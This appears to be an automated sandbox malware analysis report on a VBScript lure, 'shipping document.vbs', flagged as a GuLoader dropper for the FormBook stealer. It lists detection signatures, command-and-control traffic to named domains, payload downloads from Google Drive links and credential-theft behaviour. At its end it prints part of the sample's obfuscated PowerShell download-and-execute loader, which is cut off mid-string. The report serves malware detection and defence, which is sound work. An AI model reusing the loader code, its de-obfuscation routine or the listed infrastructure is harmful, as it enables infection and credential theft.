Windows Analysis Report
shipping document.vbs

Overview

General Information

Sample name: shipping document.vbs
Analysis ID: 1430120
MD5: 1dce662b3782fbec7c5f4f73d8e63f41
SHA1: 25cf442e9e62d5a83dd81c980da84c5ec27dac75
SHA256: 35b1922951d049fedf34ebd18d57fd8acccaf65e462c6dc6308f5d63e17381ee
Tags: vbs

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Creates autostart registry keys with suspicious names
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: shipping document.vbs ReversingLabs: Detection: 31%
Source: shipping document.vbs Virustotal: Detection: 40%
Source: Yara match File source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: unknown HTTPS traffic detected: 142.251.41.14:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.41.14:443 -> 192.168.2.9:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.9:49716 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000009.00000002.1926528931.00000000008E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbD9%m! source: powershell.exe, 00000009.00000002.1939448940.00000000081E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe
Source: Binary string: stem.Core.pdb source: powershell.exe, 00000009.00000002.1938944597.0000000008184000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbb: source: powershell.exe, 00000009.00000002.1939448940.00000000081E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdbGCTL source: NJeXDhPqkKUqTApfiOc.exe, 00000012.00000002.2755874529.00000000025CC000.00000004.00000001.00040000.00000000.sdmp
Source: Binary string: wab.pdb source: NJeXDhPqkKUqTApfiOc.exe, 00000012.00000002.2755874529.00000000025CC000.00000004.00000001.00040000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49719 -> 80.240.20.220:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49720 -> 157.7.107.63:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49721 -> 157.7.107.63:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49723 -> 157.7.107.63:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49724 -> 172.217.16.36:80
Source: Joe Sandbox View ASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1enaCO0QiARITh4QuvSrQwWrYj3gEKjnh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1enaCO0QiARITh4QuvSrQwWrYj3gEKjnh&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /3g97/?Z0cP=R2YdndZh2B6&jJEDgF=0byNfP8xYbFTvv3QATAnaN6BV2N8MY8k+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhJjDvkLInRorT+v+nJR1Y5dgJEbJjbg== HTTP/1.1Host: www.jthzbrdb.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic HTTP traffic detected: GET /3g97/?jJEDgF=14Ldh71M1tAlq6177H/PKNF5DbUzFdqFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkXEr3vevJ7TDEj044XktAOzbrek1ipg==&Z0cP=R2YdndZh2B6 HTTP/1.1Host: www.a-two-spa-salon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: unknown HTTP traffic detected: POST /3g97/ HTTP/1.1Host: www.a-two-spa-salon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 195Cache-Control: max-age=0Origin: http://www.a-two-spa-salon.comReferer: http://www.a-two-spa-salon.com/3g97/User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Data Ascii: jJEDgF=46j9iO5agqM5rMxF9SGeOt1hNfBgO+umHq4dLJgkKRB1e8d/PnCOXs1+Q4it3tjajwaZSPpnfc22ZzOPEBbQalbXgPjqninT/U44YW9rWmXJUw9Uyw0ZV+TDnAO6dhFW/IrbGqrbFLGsN79W4FU5/zfnfA0VugtpQ7xIFSYFA49pL7BPI4tz2nPidtJs
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Apr 2024 05:54:55 GMTContent-Type: text/htmlContent-Length: 1409Connection: closeVary: Accept-EncodingETag: "629dd94c-581"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Apr 2024 05:55:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Apr 2024 05:55:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Apr 2024 05:55:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
Source: wscript.exe, 00000000.00000003.1587198761.0000023236DAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1588971000.0000023236E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.1587198761.0000023236DAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1588971000.0000023236E3A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1589082209.0000023238BA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1471191935.0000023238C09000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1470955854.0000023238BE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b1a9c0e1c6
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDF34C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: firefox.exe, 00000015.00000002.2537345110.000000002C054000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://hostname.domain.tld/
Source: powershell.exe, 00000003.00000002.2059655451.000001FCED5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1927433604.0000000004531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.ps/Docs/Repository.htm0
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD561000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.1927433604.0000000004531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDEFBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDEFBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD787000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5P
Source: powershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5XR
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDD9EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDD9EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5&export=download
Source: powershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDE9B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.2059655451.000001FCED5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown HTTPS traffic detected: 142.251.41.14:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.41.14:443 -> 192.168.2.9:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.9:49716 version: TLS 1.2

E-Banking Fraud

Source: Yara match File source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: amsi32_5852.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6856, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5852, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Initial file: Forbrugerprises.ShellExecute Investeringsrammens,Kommunikere,"","" ,Arbejdsanvisning
Source: shipping document.vbs Static file information: Suspicious name
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6558
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6558
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei 